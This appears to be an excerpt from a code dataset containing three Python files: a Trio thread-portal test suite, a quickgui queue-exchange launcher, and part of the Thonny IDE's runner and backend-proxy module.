source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_threads.py | import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import *
from .._core.tests.test_ki import ki_self
from .._core.tests.tutil import slow
async def test_do_in_trio_thread():
trio_thread = threading.current_thread()
async def check_case(do_in_trio_thread, fn, expected):
record = []
def threadfn():
try:
record.append(("start", threading.current_thread()))
x = do_in_trio_thread(fn, record)
record.append(("got", x))
except BaseException as exc:
print(exc)
record.append(("error", type(exc)))
child_thread = threading.Thread(target=threadfn, daemon=True)
child_thread.start()
while child_thread.is_alive():
print("yawn")
await sleep(0.01)
assert record == [
("start", child_thread), ("f", trio_thread), expected
]
portal = BlockingTrioPortal()
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
return 2
await check_case(portal.run_sync, f, ("got", 2))
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
raise ValueError
await check_case(portal.run_sync, f, ("error", ValueError))
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
return 3
await check_case(portal.run, f, ("got", 3))
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
raise KeyError
await check_case(portal.run, f, ("error", KeyError))
async def test_do_in_trio_thread_from_trio_thread():
portal = BlockingTrioPortal()
with pytest.raises(RuntimeError):
portal.run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
portal.run(foo)
async def test_BlockingTrioPortal_with_explicit_TrioToken():
token = _core.current_trio_token()
def worker_thread(token):
with pytest.raises(RuntimeError):
BlockingTrioPortal()
portal = BlockingTrioPortal(token)
return portal.run_sync(threading.current_thread)
t = await run_sync_in_worker_thread(worker_thread, token)
assert t == threading.current_thread()
def test_run_in_trio_thread_ki():
# if we get a control-C during a run_in_trio_thread, then it propagates
# back to the caller (slick!)
record = set()
async def check_run_in_trio_thread():
portal = BlockingTrioPortal()
def trio_thread_fn():
print("in Trio thread")
assert not _core.currently_ki_protected()
print("ki_self")
try:
ki_self()
finally:
import sys
print("finally", sys.exc_info())
async def trio_thread_afn():
trio_thread_fn()
def external_thread_fn():
try:
print("running")
portal.run_sync(trio_thread_fn)
except KeyboardInterrupt:
print("ok1")
record.add("ok1")
try:
portal.run(trio_thread_afn)
except KeyboardInterrupt:
print("ok2")
record.add("ok2")
thread = threading.Thread(target=external_thread_fn)
thread.start()
print("waiting")
while thread.is_alive():
await sleep(0.01)
print("waited, joining")
thread.join()
print("done")
_core.run(check_run_in_trio_thread)
assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
record = []
ev = Event()
async def trio_fn():
record.append("sleeping")
ev.set()
await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def thread_fn(portal):
try:
portal.run(trio_fn)
except _core.Cancelled:
record.append("cancelled")
async def main():
portal = BlockingTrioPortal()
thread = threading.Thread(target=thread_fn, args=(portal,))
thread.start()
await ev.wait()
assert record == ["sleeping"]
return thread
thread = _core.run(main)
thread.join()
assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
trio_thread = threading.current_thread()
def f(x):
return (x, threading.current_thread())
x, child_thread = await run_sync_in_worker_thread(f, 1)
assert x == 1
assert child_thread != trio_thread
def g():
raise ValueError(threading.current_thread())
with pytest.raises(ValueError) as excinfo:
await run_sync_in_worker_thread(g)
print(excinfo.value.args)
assert excinfo.value.args[0] != trio_thread
async def test_run_in_worker_thread_cancellation():
register = [None]
def f(q):
# Make the thread block for a controlled amount of time
register[0] = "blocking"
q.get()
register[0] = "finished"
async def child(q, cancellable):
record.append("start")
try:
return await run_sync_in_worker_thread(
f, q, cancellable=cancellable
)
finally:
record.append("exit")
record = []
q = stdlib_queue.Queue()
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, True)
# Give it a chance to get started. (This is important because
# run_sync_in_worker_thread does a checkpoint_if_cancelled before
# blocking on the thread, and we don't want to trigger this.)
await wait_all_tasks_blocked()
assert record == ["start"]
# Then cancel it.
nursery.cancel_scope.cancel()
# The task exited, but the thread didn't:
assert register[0] != "finished"
# Put the thread out of its misery:
q.put(None)
while register[0] != "finished":
time.sleep(0.01)
# This one can't be cancelled
record = []
register[0] = None
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, False)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
for _ in range(10):
await _core.checkpoint()
# It's still running
assert record == ["start"]
q.put(None)
# Now it exits
# But if we cancel *before* it enters, the entry is itself a cancellation
# point
with _core.CancelScope() as scope:
scope.cancel()
await child(q, False)
assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd):
q1 = stdlib_queue.Queue()
q2 = stdlib_queue.Queue()
def thread_fn():
q1.get()
q2.put(threading.current_thread())
async def main():
async def child():
await run_sync_in_worker_thread(thread_fn, cancellable=True)
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
_core.run(main)
q1.put(None)
# This makes sure:
# - the thread actually ran
# - that thread has finished before we check for its output
thread = q2.get()
while thread.is_alive():
time.sleep(0.01) # pragma: no cover
# Make sure we don't have a "Exception in thread ..." dump to the console:
out, err = capfd.readouterr()
assert not out and not err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
# This test is a bit tricky. The goal is to make sure that if we set
# limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
# running at a time, even if there are more concurrent calls to
# run_sync_in_worker_thread, and even if some of those are cancelled. And
# also to make sure that the default limiter actually limits.
COUNT = 2 * MAX
gate = threading.Event()
lock = threading.Lock()
if use_default_limiter:
c = current_default_worker_thread_limiter()
orig_total_tokens = c.total_tokens
c.total_tokens = MAX
limiter_arg = None
else:
c = CapacityLimiter(MAX)
orig_total_tokens = MAX
limiter_arg = c
try:
# We used to use regular variables and 'nonlocal' here, but it turns
# out that it's not safe to assign to closed-over variables that are
# visible in multiple threads, at least as of CPython 3.6 and PyPy
# 5.8:
#
# https://bugs.python.org/issue30744
# https://bitbucket.org/pypy/pypy/issues/2591/
#
# Mutating them in-place is OK though (as long as you use proper
# locking etc.).
class state:
pass
state.ran = 0
state.high_water = 0
state.running = 0
state.parked = 0
portal = BlockingTrioPortal()
def thread_fn(cancel_scope):
print("thread_fn start")
portal.run_sync(cancel_scope.cancel)
with lock:
state.ran += 1
state.running += 1
state.high_water = max(state.high_water, state.running)
# The Trio thread below watches this value and uses it as a
# signal that all the stats calculations have finished.
state.parked += 1
gate.wait()
with lock:
state.parked -= 1
state.running -= 1
print("thread_fn exiting")
async def run_thread(event):
with _core.CancelScope() as cancel_scope:
await run_sync_in_worker_thread(
thread_fn,
cancel_scope,
limiter=limiter_arg,
cancellable=cancel
)
print(
"run_thread finished, cancelled:",
cancel_scope.cancelled_caught
)
event.set()
async with _core.open_nursery() as nursery:
print("spawning")
events = []
for i in range(COUNT):
events.append(Event())
nursery.start_soon(run_thread, events[-1])
await wait_all_tasks_blocked()
# In the cancel case, we in particular want to make sure that the
# cancelled tasks don't release the semaphore. So let's wait until
# at least one of them has exited, and that everything has had a
# chance to settle down from this, before we check that everyone
# who's supposed to be waiting is waiting:
if cancel:
print("waiting for first cancellation to clear")
await events[0].wait()
await wait_all_tasks_blocked()
# Then wait until the first MAX threads are parked in gate.wait(),
# and the next MAX threads are parked on the semaphore, to make
# sure no-one is sneaking past, and to make sure the high_water
# check below won't fail due to scheduling issues. (It could still
# fail if too many threads are let through here.)
while state.parked != MAX or c.statistics().tasks_waiting != MAX:
await sleep(0.01) # pragma: no cover
# Then release the threads
gate.set()
assert state.high_water == MAX
if cancel:
# Some threads might still be running; need to wait to them to
# finish before checking that all threads ran. We can do this
# using the CapacityLimiter.
while c.borrowed_tokens > 0:
await sleep(0.01) # pragma: no cover
assert state.ran == COUNT
assert state.running == 0
finally:
c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
# Basically just checking that we only call acquire_on_behalf_of and
# release_on_behalf_of, since that's part of our documented API.
record = []
class CustomLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
self._borrower = borrower
def release_on_behalf_of(self, borrower):
record.append("release")
assert borrower == self._borrower
await run_sync_in_worker_thread(lambda: None, limiter=CustomLimiter())
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
record = []
class BadCapacityLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
def release_on_behalf_of(self, borrower):
record.append("release")
raise ValueError
bs = BadCapacityLimiter()
with pytest.raises(ValueError) as excinfo:
await run_sync_in_worker_thread(lambda: None, limiter=bs)
assert excinfo.value.__context__ is None
assert record == ["acquire", "release"]
record = []
# If the original function raised an error, then the semaphore error
# chains with it
d = {}
with pytest.raises(ValueError) as excinfo:
await run_sync_in_worker_thread(lambda: d["x"], limiter=bs)
assert isinstance(excinfo.value.__context__, KeyError)
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
# Test the unlikely but possible case where trying to spawn a thread fails
def bad_start(self):
raise RuntimeError("the engines canna take it captain")
monkeypatch.setattr(threading.Thread, "start", bad_start)
limiter = current_default_worker_thread_limiter()
assert limiter.borrowed_tokens == 0
# We get an appropriate error, and the limiter is cleanly released
with pytest.raises(RuntimeError) as excinfo:
await run_sync_in_worker_thread(lambda: None) # pragma: no cover
assert "engines" in str(excinfo.value)
assert limiter.borrowed_tokens == 0
|
launcher_exchange.py | '''
A simple application that binds together a task and a GUI.
Both task and GUI must be callables and accept
two arguments in order to receive the
communication queues.
'''
import queue
import select
import threading
from collections.abc import Iterable
from quickgui.framework.queues import NewLineQueue
from quickgui.framework.quick_base import time_to_die, set_time_to_die
class Exchange():
'''
Central exchange for queues.
Incoming messages from any queue are replicated to all output queues,
except for the ones in the same category.
'''
def __init__(self):
self.qins = []
self.qouts = []
def get(self, category=''):
qin = NewLineQueue()
qout = NewLineQueue()
qin.category = category
qout.category = category
self.qins.append(qin)
self.qouts.append(qout)
return qin, qout
def run(self):
while not time_to_die():
r, _, _ = select.select(self.qouts, [], [])
for qout in r:
data = qout.get(block=False)
for qin in self.qins:
if qin.category != qout.category:
try:
qin.put(data, block=False)
except queue.Full:
pass
def start(task=None, gui=None, task_servers=None, gui_client=None):
'''
App launcher
task = task running in background
gui: GUI running in foreground
task_servers: optional server(s) for task, for remote connections
gui_client: optional client for GUI, for remote connections
This launcher uses the class Exchange above to simplify
the queue plumbing.
However the exchange causes rapid message inflation for anything but
the simplest topologies.
'''
if task_servers is None:
task_servers = []
elif not isinstance(task_servers, Iterable):
task_servers = [task_servers]
if task_servers and not task:
raise Exception('Task servers can only be started together with tasks')
if gui_client and task:
raise Exception('GUI client can be started with GUIs only')
joinables = []
exchange = Exchange()
for i, server in enumerate(task_servers):
qin, qout = exchange.get('task_server')
t = threading.Thread(target=server, args=(qout, qin))
t.start()
joinables.append(t)
if task:
qin, qout = exchange.get('task')
t = threading.Thread(target=task, args=(qin, qout))
t.start()
joinables.append(t)
if gui_client:
qin, qout = exchange.get('gui_client')
t = threading.Thread(target=gui_client, args=(qout, qin))
t.start()
joinables.append(t)
# Start GUI in foreground
# This call will block until the gui quits.
if gui:
qin, qout = exchange.get('gui')
threading.Thread(target=exchange.run).start()
if gui:
gui(qin, qout)
set_time_to_die(True)
for joinable in joinables:
joinable.join()
def self_contained_app(task, gui):
q1 = NewLineQueue()
q2 = NewLineQueue()
# Spawn task
t = threading.Thread(target=task, args=(q1, q2))
t.start()
# Start GUI (with reversed queues)
gui(q2, q1)
# Shutdown task
q1.put('quit')
t.join()
|
running.py | # -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
from logging import debug
from threading import Thread
from time import sleep
from tkinter import ttk
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench, ui_utils
from thonny.code import get_current_breakpoints, get_saved_current_script_filename, is_remote_path
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path,
)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence, show_dialog, CommonDialogEx
from tkinter import messagebox
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = "" # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
EXPECTED_TERMINATION_CODE = 1234
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: Any
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
self._check_alloc_console()
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
RUN_COMMAND_LABEL = _("Run current script")
RUN_COMMAND_CAPTION = _("Run")
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
try:
import thonny.plugins.debugger # @UnusedImport
debugger_available = True
except ImportError:
debugger_available = False
get_workbench().add_command(
"run_current_script",
"run",
RUN_COMMAND_LABEL,
caption=RUN_COMMAND_CAPTION,
handler=self.cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self.cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
_("Run current script in terminal"),
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
_("Stop/Restart backend"),
caption=_("Stop"),
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=100,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
_("Interrupt execution"),
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence="<Control-c>",
group=100,
bell_when_denied=False,
)
get_workbench().add_command(
"softreboot",
"run",
_("Send EOF / Soft reboot"),
self.soft_reboot,
self.soft_reboot_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"disconnect",
"run",
_("Disconnect"),
self.disconnect,
self.disconnect_enabled,
group=100,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
"""
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logging.warning(
"RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
)
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
if "id" not in cmd:
cmd["id"] = generate_command_id()
# Offer the command
logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
get_workbench().event_generate("BackendRestart", full=False)
if cmd.get("blocking"):
dlg = BlockingDialog(get_workbench(), cmd)
show_dialog(dlg)
return dlg.response
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logging.warning("Can't pile up too many commands. This command will be just ignored")
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logging.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if working_directory is not None and get_workbench().get_local_cwd() != working_directory:
# create compound command
# start with %cd
cd_cmd_line = construct_cd_command(working_directory) + "\n"
next_cwd = working_directory
else:
# create simple command
cd_cmd_line = ""
next_cwd = get_workbench().get_local_cwd()
if not is_remote_path(script_path) and self._proxy.uses_local_filesystem():
rel_filename = os.path.relpath(script_path, next_cwd)
cmd_parts = ["%" + command_name, rel_filename] + args
else:
cmd_parts = ["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args
exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_current(self, command_name: str) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(True, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# user has cancelled file saving
return
if is_remote_path(filename) or not self._proxy.uses_local_filesystem():
working_directory = None
else:
# changing dir may be required
script_dir = os.path.dirname(filename)
if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
working_directory = script_dir # type: Optional[str]
else:
working_directory = None
args = self._get_active_arguments()
self.execute_script(filename, args, working_directory, command_name)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self.cmd_run_current_script_enabled()
)
def cmd_run_current_script(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
filename = get_saved_current_script_filename()
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
self._proxy.interrupt()
else:
logging.warning("Interrupting without proxy")
def _cmd_interrupt_enabled(self) -> bool:
if not self._proxy or not self._proxy.is_functional():
return False
# TODO: distinguish command and Ctrl+C shortcut
widget = get_workbench().focus_get()
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy
if widget is not None and hasattr(widget, "selection_get"):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
return False
except Exception:
# selection_get() gives error when calling without selection on Ubuntu
pass
return self.is_running() or self.is_waiting_toplevel_command()
def cmd_stop_restart(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.restart_backend(True)
def disconnect(self):
proxy = self.get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled(self):
return hasattr(self.get_backend_proxy(), "disconnect")
def soft_reboot(self):
proxy = self.get_backend_proxy()
if hasattr(proxy, "_soft_reboot_and_run_main"):
return proxy._soft_reboot_and_run_main()
return None
def soft_reboot_enabled(self):
proxy = self.get_backend_proxy()
return proxy and proxy.is_functional() and hasattr(proxy, "_soft_reboot_and_run_main")
def _poll_vm_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_vm_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_vm_messages)
def _pull_vm_messages(self):
while self._proxy is not None:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
logging.debug(
"RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
)
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
else:
"other messages don't affect the state"
if "cwd" in msg:
if not self.has_own_filesystem():
get_workbench().set_local_cwd(msg["cwd"])
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
returncode = getattr(exc, "returncode", "?")
err = "Backend terminated or disconnected."
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logging.exception("Failed retrieving backend faults")
err = err.strip() + " Use 'Stop/Restart' to restart ...\n"
if returncode != EXPECTED_TERMINATION_CODE:
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
get_workbench().become_active_window(False)
def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_vm_messages()
if wait:
start_time = time.time()
while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
# self._pull_vm_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart", full=True)
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
get_workbench().event_generate("BackendTerminated")
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("thonny.exe") or sys.executable.endswith("pythonw.exe"):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("thonny.exe", "python.exe").replace(
"pythonw.exe", "python.exe"
)
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logging.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logging.getLogger("thonny").exception("Problem with finalizing console allocation")
def can_do_file_operations(self):
return self._proxy and self._proxy.can_do_file_operations()
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def has_own_filesystem(self):
if self._proxy is None:
return False
else:
return self._proxy.has_own_filesystem()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
raise NotImplementedError()
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def interrupt(self):
"""Tries to interrupt current command without reseting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_functional(self):
"""Used in MicroPython proxies"""
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def has_own_filesystem(self):
return False
def uses_local_filesystem(self):
return True
def supports_directories(self):
return True
def supports_trash(self):
return True
def can_do_file_operations(self):
return False
def get_cwd(self):
return None
class SubprocessProxy(BackendProxy):
def __init__(self, clean: bool, executable: str) -> None:
super().__init__(clean)
self._executable = executable
self._response_queue = None
self._welcome_text = ""
self._proc = None
self._response_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self._in_venv = None
self._cwd = self._get_initial_cwd()
self._start_background_process(clean=clean)
def _get_initial_cwd(self):
return None
def _start_background_process(self, clean=None):
# deque, because in one occasion I need to put messages back
self._response_queue = collections.deque()
# prepare environment
env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
env["PYTHONIOENCODING"] = "utf-8"
# because cmd line option -u won't reach child processes
# see https://github.com/thonny/thonny/issues/808
env["PYTHONUNBUFFERED"] = "1"
# Let back-end know about plug-ins
env["THONNY_USER_DIR"] = THONNY_USER_DIR
env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)
if get_workbench().in_debug_mode():
env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in env:
del env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
cmd_line = [
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
] + self._get_launcher_with_args()
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
self._proc = subprocess.Popen(
cmd_line,
# bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.get_cwd() if self.uses_local_filesystem() else None,
env=env,
universal_newlines=True,
creationflags=creationflags,
)
# setup asynchronous output listeners
Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()
def _get_launcher_with_args(self):
raise NotImplementedError()
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
return getattr(self, method_name)(cmd)
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._clear_environment()
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def _clear_environment(self):
pass
